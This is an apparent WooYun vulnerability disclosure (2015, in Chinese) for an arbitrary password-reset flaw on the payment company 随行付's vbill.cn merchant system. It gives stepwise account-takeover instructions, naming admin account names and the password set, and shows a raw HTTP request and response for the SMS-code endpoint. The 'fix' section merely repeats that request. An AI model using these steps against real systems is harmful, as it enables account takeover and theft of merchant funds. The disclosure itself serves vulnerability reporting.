当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125569

漏洞标题:随行付任意密码重涉及大量资金可刷POS机提现

相关厂商:北京随行付信息技术有限公司

漏洞作者: 奥特曼

提交时间:2015-08-07 13:02

修复时间:2015-09-21 13:04

公开时间:2015-09-21 13:04

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

忘记密码处进行重设可以抓捕拦截手机验证进行重设密码
http://www.vbill.cn/mss/SafePwd/safe_rese_pwd.htm 进行密码找回。
账号有 admin1 admin2 admin3 admin4 等等
使用绑定手机找回,本地代理抓包得到手机验证码,即可重设密码。
http://www.vbill.cn/mss/login/loginOut.htm?lgUrl= 重设好密码在此处进行登录
帐号admin1 密码qq123456 2.帐号admin2 密码qq123456
以此类推,帐号对上,密码就可以重设。

POST /mss/SafePwd/sendPhoneMsg.htm HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.vbill.cn/mss/SafePwd/safe_rese_pwd3.htm?type=pwdMsg&uuid=aec1c557e4f445d59a3c91fbac8aecfe
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.vbill.cn
Content-Length: 19
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=5E527A30530992B3F52B89DEE575E60D; _5t_trace_sid=87b524b3ba0afe81013dd448188d103e; _5t_trace_tms=1
bindTel=13626131230
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: zh-CN
Date: Thu, 09 Jul 2015 11:01:11 GMT
Content-Length: 247
{"retInf":"6396","safeBean":{"uuid":null,"inMno":null,"safeLevel":null,"bindTel":"18860900198","payPwd":null,"question":null,"question2":null,"answer":null,"answer2":null,"legPerCrdNo":null,"user":null,"retMsg":null,"usaPwd":null,"password":null}}

漏洞证明:

132.png

131.png

1.jpg


2.png


修复方案:

POST /mss/SafePwd/sendPhoneMsg.htm HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.vbill.cn/mss/SafePwd/safe_rese_pwd3.htm?type=pwdMsg&uuid=aec1c557e4f445d59a3c91fbac8aecfe
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.vbill.cn
Content-Length: 19
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=5E527A30530992B3F52B89DEE575E60D; _5t_trace_sid=87b524b3ba0afe81013dd448188d103e; _5t_trace_tms=1
bindTel=13626131230
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: zh-CN
Date: Thu, 09 Jul 2015 11:01:11 GMT
Content-Length: 247
{"retInf":"6396","safeBean":{"uuid":null,"inMno":null,"safeLevel":null,"bindTel":"18860900198","payPwd":null,"question":null,"question2":null,"answer":null,"answer2":null,"legPerCrdNo":null,"user":null,"retMsg":null,"usaPwd":null,"password":null}}</code>
设计不当 ,修复

版权声明:转载请注明来源 奥特曼@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)